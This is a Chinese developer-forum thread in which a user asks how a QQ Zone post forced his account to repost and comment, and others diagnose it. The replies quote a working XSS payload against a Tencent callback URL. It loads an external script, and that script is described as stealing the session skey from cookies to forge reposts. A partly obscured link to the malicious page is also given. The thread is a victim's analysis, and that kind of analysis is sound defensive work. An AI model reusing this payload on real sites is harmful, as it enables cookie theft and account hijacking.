QQ空间说说自动转载的实现问题

黄鹤楼2333 2015-08-19 09:01:09
朋友转载了个奇怪的QQ说说,然后我点进去看
#因为感觉他怎么会转载这样的东西呢?
然后我也中招了,自动转载了且评论了。
我在想,这个自动转载是直接在那篇日志源码上写了调用转载的接口和评论的接口?
有没有大大可以讲讲这种自动转载的原理呢??
...全文
349 11 打赏 收藏 转发到动态 举报
写回复
用AI写文章
11 条回复
切换为时间正序
请发表友善的回复…
发表回复
黄鹤楼2333 2015-08-19
  • 打赏
  • 举报
 回复
引用 8 楼 cjqpker 的回复:
[quote=引用 7 楼 qq_30093875 的回复:] [quote=引用 6 楼 cjqpker 的回复:] http://baike.baidu.com/link?url=77sMG0v65NEEMVr2FerMSoM8EYWKAwB590OuVJn1XfuOdn4ELgSbtRFFsF6SSSa20r53IqWwCYUe5GZHZI9hFa
看了下源码,感觉这段比较可疑,<iframe src="http://rtb.map.qq.com/rtbus?qt=comps&cb=</script><svg><script>eval(window.name);//" name="s=document.createElement('script');document.body.appendChild(s);s.src='http://conf3.gamexm.net/moo.js';" style="display[/quote] 危险无处不在啊[/quote] qq上问过某大神了,已经搞定了。 腾讯的某个网址http://rtb.map.qq.com/rtbus?qt=comps&cb=出现了一个XSS漏洞 然后这个漏洞调用了 http://conf3.gamexm.net/moo.js 这个moo.js加密过的, 然后chromeF12解密, 发现这个代码又链接向了另外一个网址 这段代码获取了你的cookie,把cookie中的skey发给这个网址, 这个asp网址获得了你的skey之后,应该就可以向腾讯的某个服务器发送请求 伪造你的信息,进行转发操作。 基本上情况就是这样。。虽然并不是很懂,但还是很感谢大神的分析。
假正经的班长 2015-08-19
  • 打赏
  • 举报
 回复
引用 7 楼 qq_30093875 的回复:
[quote=引用 6 楼 cjqpker 的回复:] http://baike.baidu.com/link?url=77sMG0v65NEEMVr2FerMSoM8EYWKAwB590OuVJn1XfuOdn4ELgSbtRFFsF6SSSa20r53IqWwCYUe5GZHZI9hFa
看了下源码,感觉这段比较可疑,<iframe src="http://rtb.map.qq.com/rtbus?qt=comps&cb=</script><svg><script>eval(window.name);//" name="s=document.createElement('script');document.body.appendChild(s);s.src='http://conf3.gamexm.net/moo.js';" style="display[/quote] 危险无处不在啊
黄鹤楼2333 2015-08-19
  • 打赏
  • 举报
 回复
引用 6 楼 cjqpker 的回复:
http://baike.baidu.com/link?url=77sMG0v65NEEMVr2FerMSoM8EYWKAwB590OuVJn1XfuOdn4ELgSbtRFFsF6SSSa20r53IqWwCYUe5GZHZI9hFa
看了下源码,感觉这段比较可疑,<iframe src="http://rtb.map.qq.com/rtbus?qt=comps&cb=</script><svg><script>eval(window.name);//" name="s=document.createElement('script');document.body.appendChild(s);s.src='http://conf3.gamexm.net/moo.js';" style="display
假正经的班长 2015-08-19
  • 打赏
  • 举报
 回复
http://baike.baidu.com/link?url=77sMG0v65NEEMVr2FerMSoM8EYWKAwB590OuVJn1XfuOdn4ELgSbtRFFsF6SSSa20r53IqWwCYUe5GZHZI9hFa
黄鹤楼2333 2015-08-19
  • 打赏
  • 举报
 回复
引用 1 楼 cjqpker 的回复:
不明觉厉,你把那个说说的链接贴出来呢,大家用虚拟机测测看
第一次用论坛回帖,不知道引用是不是回复楼层的意思。。。 网址是: ''http://scljdty.我xaspshonvx.是yfcf.网pw/址view/3/?id=1,0.1940088'' 去掉这些字
黄鹤楼2333 2015-08-19
  • 打赏
  • 举报
 回复
不懂。。。
引用 2 楼 lgbxyz 的回复:
CSRF ?
黄鹤楼2333 2015-08-19
  • 打赏
  • 举报
 回复
网址是: ''http://scljdty.我xaspshonvx.是yfcf.网pw/址view/3/?id=1,0.1940088'' 去掉这些字
黄鹤楼2333 2015-08-19
  • 打赏
  • 举报
 回复
引用 10 楼 Evankaka 的回复:
这就是获取你的sessionId后进行伪造的手段
要是那个网站有token的更新权限就完了。。。我早上没改密码,果然晚上又自动转发了。晚上改了密码,不知到之前token会不会失效。。
LubinLew 2015-08-19
  • 打赏
  • 举报
 回复
CSRF ?
假正经的班长 2015-08-19
  • 打赏
  • 举报
 回复
不明觉厉,你把那个说说的链接贴出来呢,大家用虚拟机测测看
Evankaka 2015-08-19
  • 打赏
  • 举报
 回复
这就是获取你的sessionId后进行伪造的手段
qq空间获取php,【点赞源码】QQ空间自动评论PHP源码
本文提供了一段用于自动评论QQ空间的PHP源码,原理类似于贴吧抢楼。代码中使用了simsimi接口进行回复,并包含获取sid的方法。此外,还提到了QQ空间点赞的实现。作者分享了代码并解释了部分关键函数的用途。
python基于selenium实现自动删除qq空间留言板
本文介绍了一款使用Python、Selenium和Chrome WebDriver实现自动化脚本,用于批量管理QQ空间的留言板,包括登录、批量删除留言等功能,提高了处理效率。
近期QQ空间转载的日志有图片显示自己的头像昵称QQ号等
本文详细解析了如何利用PHP脚本结合腾讯开放API,在QQ空间生成包含用户头像、昵称及位置信息的动态图片,介绍了实现原理及具体步骤。
qq空间强制访问_QQ空间引流
本文详细介绍了微商如何利用QQ空间进行引流的24种方法,包括发布有价值的内容、利用图片圈人功能、录制相关视频等多种手段,以实现快速增加好友数量的目标。
php 怎么实现空间点赞,【点赞源码】QQ空间自动点赞PHP源码
这是一个PHP源码,用于实现QQ空间自动点赞功能。用户输入QQ号和sid,程序将自动抓取并点赞好友的。代码中包含了使用simsimi接口进行回复的逻辑,并提供了获取sid的方法。此外,还提到了可以使用图灵机器人API作为替代。
其它技术问题

3,881

社区成员

9,044

社区内容

发帖
与我相关
我的任务
社区描述
C/C++ 其它技术问题
社区管理员
  • 其它技术问题社区
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章